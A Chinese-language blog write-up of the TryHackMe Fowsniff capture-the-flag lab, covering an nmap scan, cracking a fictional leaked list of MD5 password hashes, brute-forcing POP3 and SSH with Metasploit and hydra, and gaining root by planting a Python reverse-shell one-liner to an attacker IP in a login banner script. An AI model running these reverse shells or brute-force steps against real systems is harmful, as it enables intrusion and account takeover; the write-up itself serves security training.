【THM】Fowsniff CTF

0x00  信息收集

我们得到ip之后先ping一下,看是否能ping通。可以ping通

我们使用nmap进行攻击性扫描,扫的有点慢,我们先访问一下他的web服务,然后再看一下nmap报告

┌──(root㉿Breeze)-[/home/breeze/Desktop]
└─# nmap 10.10.184.242 -sV -sS -A -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-17 19:30 CST
Nmap scan report for 10.10.184.242
Host is up (0.29s latency).
Not shown: 996 closed tcp ports (reset)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 90:35:66:f4:c6:d2:95:12:1b:e8:cd:de:aa:4e:03:23 (RSA)
|   256 53:9d:23:67:34:cf:0a:d5:5a:9a:11:74:bd:fd:de:71 (ECDSA)
|_  256 a2:8f:db:ae:9e:3d:c9:e6:a9:ca:03:b1:d7:1b:66:83 (ED25519)
80/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Fowsniff Corp - Delivering Solutions
| http-robots.txt: 1 disallowed entry 
|_/
110/tcp open  pop3    Dovecot pop3d
|_pop3-capabilities: PIPELINING USER AUTH-RESP-CODE CAPA SASL(PLAIN) RESP-CODES UIDL TOP
143/tcp open  imap    Dovecot imapd
|_imap-capabilities: SASL-IR ID LOGIN-REFERRALS OK AUTH=PLAINA0001 have post-login ENABLE capabilities IMAP4rev1 listed Pre-login LITERAL+ more IDLE
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=5/17%OT=22%CT=1%CU=35826%PV=Y%DS=5%DC=T%G=Y%TM=6647
OS:401A%P=x86_64-pc-linux-gnu)SEQ(SP=109%GCD=1%ISR=10B%TI=Z%CI=I%TS=8)SEQ(S
OS:P=109%GCD=1%ISR=10B%TI=Z%CI=RD%TS=8)OPS(O1=M508ST11NW7%O2=M508ST11NW7%O3
OS:=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST11NW7%O6=M508ST11)WIN(W1=68DF%W2=6
OS:8DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW
OS:7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF
OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=
OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=
OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RI
OS:PCK=G%RUCK=G%RUD=G)IE(R=N)

Network Distance: 5 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 554/tcp)
HOP RTT       ADDRESS
1   167.29 ms 10.17.0.1
2   ... 4
5   298.57 ms 10.10.184.242

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.75 seconds

 我登录web页面,查看robots.txt也没有发现什么有用的信息,但是我发现了一个推特账号,于是进行社工。

社工到密码信息

0x01  爆破md5

FOWSNIFF CORP PASSWORD LEAK
            ''~``
           ( o o )
+-----.oooO--(_)--Oooo.------+
|                            |
|          FOWSNIFF          |
|            got             |
|           PWN3D!!!         |
|                            |         
|       .oooO                |         
|        (   )   Oooo.       |         
+---------\ (----(   )-------+
           \_)    ) /
                 (_/
FowSniff Corp got pwn3d by B1gN1nj4!
No one is safe from my 1337 skillz!
 
 
mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4
mustikka@fowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56
tegel@fowsniff:1dc352435fecca338acfd4be10984009
baksteen@fowsniff:19f5af754c31f1e2651edde9250d69bb
seina@fowsniff:90dc16d47114aa13671c697fd506cf26
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd
mursten@fowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b
parede@fowsniff:4d6e42f56e127803285a0a7649b5ab11
sciana@fowsniff:f7fd98d380735e859f8b2ffbbede5a7e
 
Fowsniff Corporation Passwords LEAKED!
FOWSNIFF CORP PASSWORD DUMP!
 
Here are their email passwords dumped from their databases.
They left their pop3 server WIDE OPEN, too!
 
MD5 is insecure, so you shouldn't have trouble cracking them but I was too lazy haha =P
 
l8r n00bz!
 
B1gN1nj4

-------------------------------------------------------------------------------------------------
This list is entirely fictional and is part of a Capture the Flag educational challenge.

--- THIS IS NOT A REAL PASSWORD LEAK ---
 
All information contained within is invented solely for this purpose and does not correspond
to any real persons or organizations.
 
Any similarities to actual people or entities is purely coincidental and occurred accidentally.

-------------------------------------------------------------------------------------------------

sed -n 's/.*://p' 1.txt > hashes.txt   我们用这条命令将后面的hash值保存下来

我们尝试用hash解密

awk -F'@' '{print $1}' fowsniff.txt > users.txt    我们用这条命令将用户名导出来。

sed -n 's/.*://p' cracked.txt > pass.txt   用这个命令将密码文件保存下来

MSF获得访问权限

我们使用msf中的anxiliary/scanner/pop3/pop3_login尝试暴力破解pop3服务

msf和九头蛇都爆破出来了!

我们直接nc登录,用user和pass登录,然后查看邮件

第一份邮件包括账号和密码

我们直接ssh登录

这里是密码。

我们用hydra进行攻击

直接登录ssh拿到shell

反弹shell

我们登入ssh发现有显示的横幅,应该是登入时有脚本运行

我们查看一下groups,查看一下当然用户所在的用户组。

我们查看一下users组的文件

find / -group users -type f 2>/dev/null

这个命令是用来查找系统中属于 "users" 用户组的所有普通文件(不包括目录)。

我们发现了 cube.sh  ,vim编辑。写入python反弹shell脚本。改ip为攻击机ip,并且用nc开启监听。

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((<IP>,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.17.48.147",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

我们用python3 -c 'import pty;pty.spawn("bin/bash")' 来获得一个稳定的shell

我们反弹后获得了root权限

直接完成任务

 

 

posted @ 2024-05-20 17:14  AllFalls  阅读(14)  评论(0编辑  收藏  举报